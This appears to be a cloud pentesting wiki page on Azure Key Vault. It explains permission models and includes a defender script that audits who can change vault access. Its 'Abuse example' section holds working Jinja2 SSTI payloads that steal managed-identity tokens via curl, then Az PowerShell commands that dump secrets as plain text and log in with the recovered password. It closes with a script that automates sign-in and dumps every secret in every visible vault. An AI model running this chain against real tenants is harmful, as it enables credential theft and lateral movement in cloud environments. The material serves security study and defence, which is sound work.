
Key Vault


Last updated 3 months ago

Key Vault is Azure's service for storing secrets such as passwords, connection strings, certificates and private keys. Azure resources that support managed identities (VMs, App Service, Functions, containers) can retrieve secrets from a key vault without any credential being stored in the resource itself, provided the identity has been granted access to the vault.

Identifier

Objects in a key vault are identified by an object identifier URL. The base URL has the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault name is globally unique. The object type is one of "keys", "secrets" or "certificates". The version can be left out, in which case the current version of the object is returned.

Access to key vaults

Key Vault supports two permission models for the data plane: Azure RBAC and vault access policies. Under the RBAC model an application is granted a built-in role on the vault (or on a single object inside it), for example "Key Vault Secrets User" or "Key Vault Administrator".

From a defender's perspective, do not use access policies. Access policies are part of the vault resource itself, so any principal with write access to the vault on the management plane (Contributor, Key Vault Contributor, Owner) can edit them and grant itself data-plane access. Under the RBAC model a Contributor cannot do that; only a principal that can create role assignments (Owner, User Access Administrator) can.

If we can compromise an Azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that under the RBAC model each key, secret and certificate is its own scope: it inherits the role assignments made on the vault, but a role can also be assigned on an individual object.

Roles who can access secrets

The built-in RBAC roles that return secret values are Key Vault Administrator, Key Vault Secrets Officer and Key Vault Secrets User. Key Vault Reader only reads metadata (names, versions, attributes), not the value itself. With access policies the equivalent is a policy that grants "Get" (and "List") on secrets.
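The check a defender (or a pentester with only a management-plane role) wants is: which permission model does this vault use, and who can change access to it. The script below is an added example and is not from the original page. It assumes Az.Accounts, Az.KeyVault and Az.Resources are installed and a session already exists; the vault name is an assumption taken from the page's sample output.

```powershell
# Added example (not from the original page): does a management-plane role on this vault
# let its holder reach the data plane? Assumes Az.Accounts, Az.KeyVault, Az.Resources and
# an existing Az session. The default vault name is an assumption from the page's output.
param([string]$VaultName = 'vault')

$kv = Get-AzKeyVault -VaultName $VaultName
if (-not $kv) { throw "vault '$VaultName' is not visible to the current identity" }

# Roles that can change who has access: on the access-policy model anyone who can write
# the vault resource can rewrite the policies; on the RBAC model only role assigners can.
$policyEditors = @('Owner', 'Contributor', 'Key Vault Contributor', 'User Access Administrator')
$roleAssigners = @('Owner', 'User Access Administrator')

# -Scope returns assignments on the vault plus those inherited from RG/subscription/MG.
$assignments = Get-AzRoleAssignment -Scope $kv.ResourceId

if ($kv.EnableRbacAuthorization) {
    "[*] $VaultName uses Azure RBAC: only role assignments grant data-plane access"
    "[*] data-plane roles currently assigned:"
    $assignments |
        Where-Object { $_.RoleDefinitionName -like 'Key Vault*' } |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize
    "[*] identities that could assign themselves a Key Vault role:"
    $assignments |
        Where-Object { $_.RoleDefinitionName -in $roleAssigners } |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize
} else {
    "[!] $VaultName uses access policies: write access to the vault resource is enough to edit them"
    "[*] current access policies (secret permissions):"
    $kv.AccessPolicies |
        Select-Object DisplayName, ObjectId, ApplicationId,
                      @{ n = 'Secrets'; e = { $_.PermissionsToSecrets -join ',' } } |
        Format-Table -AutoSize
    "[!] identities holding a role that can rewrite those policies:"
    $assignments |
        Where-Object { $_.RoleDefinitionName -in $policyEditors } |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize
    # Remediation: move the vault to the RBAC model, then grant data-plane roles explicitly.
    # Update-AzKeyVault -VaultName $VaultName -ResourceGroupName $kv.ResourceGroupName -EnableRbacAuthorization $true
}
```

Run it against every vault returned by `Get-AzKeyVault` to find the ones where a Contributor on the resource group (inherited into the vault scope) is effectively a secrets reader.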

Abuse example

We have an App Service that is vulnerable to Jinja2 SSTI. Through it we request an access token for the Key Vault data plane (audience https://vault.azure.net/) from the App Service managed identity endpoint. The response is JSON; the token is in the access_token field:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We also need an access token for ARM (the management plane, audience https://management.azure.com/) so that we can enumerate the vaults themselves:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We connect with Az PowerShell using both tokens. The data-plane token goes in -KeyVaultAccessToken; -AccountId is the managed identity's client ID, which is the appid claim inside the token:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultAccessToken $token

Next, list the vaults the ARM token can see. This is a management-plane call and needs only a Reader-level role on the vault resource; it says nothing yet about whether we can read the contents:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can list secrets. Listing returns metadata only (name, version, enabled, expiry); reading the value is a separate permission:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, read the secret value as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!

Use the recovered credentials to connect with Az PowerShell (password-only sign-in works only if the account is not protected by MFA or a Conditional Access policy):

$passwd = ConvertTo-SecureString "Password123!" -AsPlainText -Force
$creds =  New-Object System.Management.Automation.PSCredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
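The manual steps above, automated end to end, as an added example that is not part of the original page: parse the two identity-endpoint responses, sign in with both tokens, then walk every vault and every secret, separating "cannot list" from "can list but cannot read". It assumes the raw JSON bodies returned by the two $IDENTITY_ENDPOINT calls were saved to two files (the file names are assumptions) and that Az.Accounts and Az.KeyVault are installed.

```powershell
# Added example (not from the original page): automate token import, sign-in and secret
# dumping. Assumes the two JSON responses from $IDENTITY_ENDPOINT were saved as the files
# below (assumed names) and that Az.Accounts + Az.KeyVault are installed.
$armToken   = (Get-Content .\arm-token.json   -Raw | ConvertFrom-Json).access_token
$vaultToken = (Get-Content .\vault-token.json -Raw | ConvertFrom-Json).access_token

# Decode the JWT payload so -AccountId and the tenant come from the token itself
# (managed-identity tokens carry the identity's client id in 'appid').
function Get-JwtPayload {
    param([Parameter(Mandatory)][string]$Token)
    $b64 = $Token.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)) | ConvertFrom-Json
}

$claims  = Get-JwtPayload $armToken
$expires = [DateTimeOffset]::FromUnixTimeSeconds($claims.exp).UtcDateTime
"[*] ARM token for appid=$($claims.appid) tenant=$($claims.tid), expires $expires UTC"

Connect-AzAccount -AccessToken $armToken -AccountId $claims.appid `
                  -KeyVaultAccessToken $vaultToken -Tenant $claims.tid | Out-Null

# Management plane: every vault the ARM token can see, with its permission model.
foreach ($item in Get-AzKeyVault) {
    $vault = Get-AzKeyVault -VaultName $item.VaultName
    "[*] $($item.VaultName) rg=$($item.ResourceGroupName) rbac=$($vault.EnableRbacAuthorization)"

    # Data plane: listing needs list/readMetadata; the value needs get. Test them separately.
    try { $secrets = Get-AzKeyVaultSecret -VaultName $item.VaultName -ErrorAction Stop }
    catch { "    list denied: $($_.Exception.Message)"; continue }

    foreach ($s in $secrets) {
        if (-not $s.Enabled) { "    $($s.Name): disabled, skipping"; continue }
        try {
            $value = Get-AzKeyVaultSecret -VaultName $item.VaultName -Name $s.Name `
                                          -AsPlainText -ErrorAction Stop
            "    $($s.Name) [$($s.ContentType)] = $value"
        } catch {
            "    $($s.Name): get denied ($($_.Exception.Message))"
        }
    }
}
```

If the vault token expires before you finish, fetch a fresh one through the SSTI and repeat the Connect-AzAccount call; the ARM session and the data-plane token are independent.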
